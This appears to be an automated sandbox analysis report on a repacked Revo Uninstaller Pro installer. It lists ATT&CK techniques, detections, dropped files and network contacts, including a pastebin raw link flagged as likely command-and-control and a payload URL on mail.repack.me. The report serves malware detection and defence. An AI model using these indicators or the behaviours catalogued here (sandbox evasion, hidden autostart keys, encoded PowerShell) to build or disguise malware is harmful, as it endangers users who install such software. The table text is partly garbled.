        Windows Service
        1
        DLL Side-Loading
        NTDS231
        Security Software Discovery
        Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
        Process Injection
        1
        File Deletion
        LSA Secrets2
        Process Discovery
        SSHKeylogging4
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
        Registry Run Keys / Startup Folder
        43
        Masquerading
        Cached Domain Credentials31
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
        Virtualization/Sandbox Evasion
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc Filesystem1
        Remote System Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
        Process Injection
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Regsvr32
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Rundll32
        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571786 Sample: Revo.Uninstaller.Pro.v5.3.4.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 44 114 pastebin.com 2->114 116 us-features.opera-api2.com 2->116 118 18 other IPs or domains 2->118 132 Multi AV Scanner detection for dropped file 2->132 134 Possible COM Object hijacking 2->134 136 AI detected suspicious sample 2->136 138 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->138 13 Revo.Uninstaller.Pro.v5.3.4.exe 61 138 2->13         started        18 ruplp.exe 2->18         started        signatures3 140 Connects to a pastebin service (likely for C&C) 114->140 process4 dnsIp5 128 pastebin.com 104.20.4.235, 443, 49709 CLOUDFLARENETUS United States 13->128 130 mail.repack.me 194.87.189.43, 443, 49710 AS-REGRU Russian Federation 13->130 104 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 13->104 dropped 106 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 13->106 dropped 108 C:\Users\user\AppData\Local\...\System.dll, PE32 13->108 dropped 110 15 other files (8 malicious) 13->110 dropped 148 Creates an undocumented autostart registry key 13->148 150 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->150 152 Sample is not signed and drops a device driver 13->152 20 cmd.exe 13->20         started        22 rundll32.exe 4 2 13->22         started        26 RevoUninPro.exe 16 5 13->26         started        28 3 other processes 13->28 file6 signatures7 process8 file9 30 PACK.EXE 20->30         started        34 conhost.exe 20->34         started        82 C:\Windows\system32\...\revoflt.sys (copy), PE32+ 22->82 dropped 84 C:\Windows\System32\drivers\SETE8C2.tmp, PE32+ 22->84 dropped 142 Creates an autostart registry key pointing to binary in C:\Windows 22->142 36 runonce.exe 2 22->36         started        signatures10 process11 file12 112 C:\Users\user\AppData\Local\Temp\...\ya.exe, PE32 30->112 dropped 154 Multi AV Scanner detection for dropped file 30->154 156 Suspicious powershell command line found 30->156 38 ya.exe 30->38         started        43 powershell.exe 30->43         started        45 powershell.exe 30->45         started        47 powershell.exe 30->47         started        49 grpconv.exe 36->49         started        signatures13 process14 dnsIp15 120 trn.lb.opera.technology 107.167.96.30, 443, 49713 IOFLOODUS United States 38->120 86 C:\Users\user\Downloads\OperaSetup.exe, PE32 38->86 dropped 88 C:\Users\user\AppData\Local\...\System.dll, PE32 38->88 dropped 90 C:\Users\user\AppData\Local\...\INetC.dll, PE32 38->90 dropped 92 C:\Users\user\AppData\...\OperaSetup[1].exe, PE32 38->92 dropped 144 Multi AV Scanner detection for dropped file 38->144 51 OperaSetup.exe 38->51         started        146 Loading BitLocker PowerShell Module 43->146 54 conhost.exe 43->54         started        56 conhost.exe 45->56         started        58 conhost.exe 47->58         started        file16 signatures17 process18 file19 80 C:\Users\user\AppData\Local\...\setup.exe, PE32 51->80 dropped 60 setup.exe 51->60         started        process20 dnsIp21 122 lati.lb.opera.technology 107.167.110.216, 443, 49718 OPERASOFTWAREUS United States 60->122 124 submit-trn.osp.opera.software 107.167.125.189, 443, 49716, 49717 OPERASOFTWAREUS United States 60->124 126 3 other IPs or domains 60->126 96 Opera_installer_2412091640027403532.dll, PE32 60->96 dropped 98 C:\Users\user\AppData\Local\...\setup.exe, PE32 60->98 dropped 100 C:\Users\user\AppData\Local\...\opera_package, PE32 60->100 dropped 102 Opera_115.0.5322.7...toupdate_x64[1].exe, PE32 60->102 dropped 64 setup.exe 60->64         started        67 setup.exe 60->67         started        69 setup.exe 60->69         started        file22 process23 file24 74 Opera_installer_2412091640048718040.dll, PE32 64->74 dropped 71 setup.exe 64->71         started        76 Opera_installer_2412091640030686032.dll, PE32 67->76 dropped 78 Opera_installer_2412091640042418092.dll, PE32 69->78 dropped process25 file26 94 Opera_installer_2412091640052497196.dll, PE32 71->94 dropped

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Revo.Uninstaller.Pro.v5.3.4.exe17%ReversingLabsWin32.Malware.Nemesis
        SourceDetectionScannerLabelLink
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys2%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys0%ReversingLabs
        C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkg30%ReversingLabs
        C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\PACK.EXE30%ReversingLabs
        C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe25%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dll0%ReversingLabs
        C:\Windows\System32\drivers\SETE8C2.tmp0%ReversingLabs
        C:\Windows\system32\DRIVERS\revoflt.sys (copy)0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.30%Avira URL Cloudsafe
        http://repacks.ddns.nethttps://repack.me/ad.htmlopen0%Avira URL Cloudsafe
        http:////file:////www.web.OS0%Avira URL Cloudsafe
        https://repack.me/ad.html0%Avira URL Cloudsafe
        http://www.mirage-systems.de/%operationName%0%Avira URL Cloudsafe
        http://www.mirage-systems.de/0%Avira URL Cloudsafe
        http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractor0%Avira URL Cloudsafe
        http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractor0%Avira URL Cloudsafe
        http://www.borland.com/namespaces/Types0%Avira URL Cloudsafe
        https://mail.repack.me/tsjtmfdm.pkg0%Avira URL Cloudsafe
        http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.10%Avira URL Cloudsafe
        https://www.revouninstallerpro.com/db/ilogs/Uninstaller0%Avira URL Cloudsafe
        http://repacks.ddns.netopen0%Avira URL Cloudsafe
        http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.10%Avira URL Cloudsafe
        https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.com0%Avira URL Cloudsafe
        https://mail.repack.me/Kj0%Avira URL Cloudsafe
        https://mail.repack.me/0%Avira URL Cloudsafe
        http://www.animation.arthouse.org0%Avira URL Cloudsafe
        http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.10%Avira URL Cloudsafe
        http://www.Licence-Protector.com0%Avira URL Cloudsafe
        http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.10%Avira URL Cloudsafe
        https://mail.repack.me/tsjtmfdm.pkg2iq0%Avira URL Cloudsafe
        https://www.revouninstallerpro.com/db/ilogs/.ruelDelete0%Avira URL Cloudsafe
        https://mail.repack.me/tsjtmfdm.pkgto0%Avira URL Cloudsafe
        http://www.vsrevogroup.com0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        mail.repack.me
        194.87.189.43
        truefalse
          unknown
          na-download.opera.com
          107.167.96.36
          truefalse
            high
            na-autoupdate.opera.com
            107.167.96.39
            truefalse
              high
              submit-trn.osp.opera.software
              107.167.125.189
              truefalse
                high
                lati.lb.opera.technology
                107.167.110.216
                truefalse
                  high
                  trn.lb.opera.technology
                  107.167.96.30
                  truefalse
                    high
                    pastebin.com
                    104.20.4.235
                    truefalse
                      high
                      autoupdate.geo.opera.com
                      unknown
                      unknownfalse
                        high
                        download3.operacdn.com
                        unknown
                        unknownfalse
                          high
                          desktop-netinstaller-sub.osp.opera.software
                          unknown
                          unknownfalse
                            high
                            features.opera-api2.com
                            unknown
                            unknownfalse
                              high
                              autoupdate.opera.com
                              unknown
                              unknownfalse
                                high
                                net.geo.opera.com
                                unknown
                                unknownfalse
                                  high
                                  download.opera.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://mail.repack.me/tsjtmfdm.pkgfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-8713-cff8411ee342&product=&channel=Stable&version=115.0.5322.77false
                                      high
                                      https://download.opera.com/download/get/?id=69044&autoupdate=1&ni=1&stream=stable&utm_campaign=r10&utm_medium=apb&utm_source=DWNLST&niuid=5e9cd0d4-a463-4317-9584-56d207f4ea74false
                                        high
                                        https://desktop-netinstaller-sub.osp.opera.software/v1/binaryfalse
                                          high
                                          https://autoupdate.opera.com/me/false
                                            high
                                            https://autoupdate.geo.opera.com/v5/netinstaller/opera/Stable/windows/x64false
                                              high
                                              https://net.geo.opera.com/opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10false
                                                high
                                                https://pastebin.com/raw/vkwZzU9Bfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.mirage-systems.de/%operationName%Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://pastebin.com/raw/vkwZzU9Bget8191Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1CDKeyExtractorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.revouninstaller.com/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.revouninstaller.com/feedback/?product=pro%d-%d-%dLastRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/soap/envelope/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.schneier.com/paper-blowfish-fse.htmlSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://pastebin.com/raw/vkwZzU9BmRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2159897408.0000000000971000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1809764960.000000000097C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tools.ietf.org/html/rfc4648SRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.mirage-systems.de/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://repacks.ddns.nethttps://repack.me/ad.htmlopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/wsdl/soap12/SVRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.color.orgRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/wsdl/soap/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1CDKeyExtractorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http:////file:////www.web.OSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://repack.me/ad.htmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.movable-type.co.uk/scripts/xxtea.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.borland.com/namespaces/TypesRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.ebgo.net1210AFEF9-4CF5-4E40-904C-344F600519D96.3Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://pastebin.com/raw/vkwZzU9BDRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.revouninstaller.com/contact-us/C:Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.revouninstaller.com/buy-update-subscription-btn/https://www.revouninstaller.com/buy-now-Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://features.opera-api2.com/api/v2/features?country=US&language=en-GB&uuid=ef78c5bf-264b-4601-87setup.exe, 0000001D.00000003.2150919335.000000000180D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.revouninstaller.com/feedback/?product=proRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.revouninstaller.com/support/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.revouninstallerpro.com/db/ilogs/UninstallerRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.revouninstaller.com/revo-uninstaller-mobile-qr-and-link/SoftwareRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/soap/encoding/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.aiim.org/pdfa/ns/id/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://mail.repack.me/KjRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://tools.ietf.org/html/rfc1321Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://repacks.ddns.netopenRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2161168994.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.borland.com/rootpart.xmlRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.ebgo.net10C763608-E632-4CB3-BE88-FD96CB346ADF6.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.revouninstaller.com/downloads-manager/?filename=pro-%shttps://www.revouninstaller.com/upRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://nsis.sf.net/NSIS_ErrorErrorRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1630444927.000000000AA62000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1403909400.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                              high
                                                                                                              https://www.revouninstaller.comAffHomewww.revouninstaller.comwww.revouninstallerpro.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.symauth.com/cps0(Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://mail.repack.me/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1844157074.00000000009AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.itl.nist.gov/fipspubs/fip180-1.htmRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.animation.arthouse.orgRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.revouninstaller.com/revo-uninstaller-pro-full-version-history/)Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.ebgo.net10FE506D4-2806-4275-9DE4-E0F9AF59DF035.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.schneier.com/paper-twofish-paper.pdfSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.Licence-Protector.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.symauth.com/rpa00Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/wsdl/http/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.ebgo.net193C3DE25-405D-440F-827C-C8A82C1E44566.1Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/wsdl/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://mail.repack.me/tsjtmfdm.pkg2iqRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.revouninstallerpro.com/db/ilogs/.ruelDeleteRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.revouninstaller.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://pastebin.com/Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.vsrevogroup.comRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://www.revouninstaller.com/updatepro5.xmlhttps://www.revouninstaller.com/downloads-manager/?filRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://mail.repack.me/tsjtmfdm.pkgtoRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.2160079714.000000000AAA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.ietf.org/rfc/rfc3447.txtSRevo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
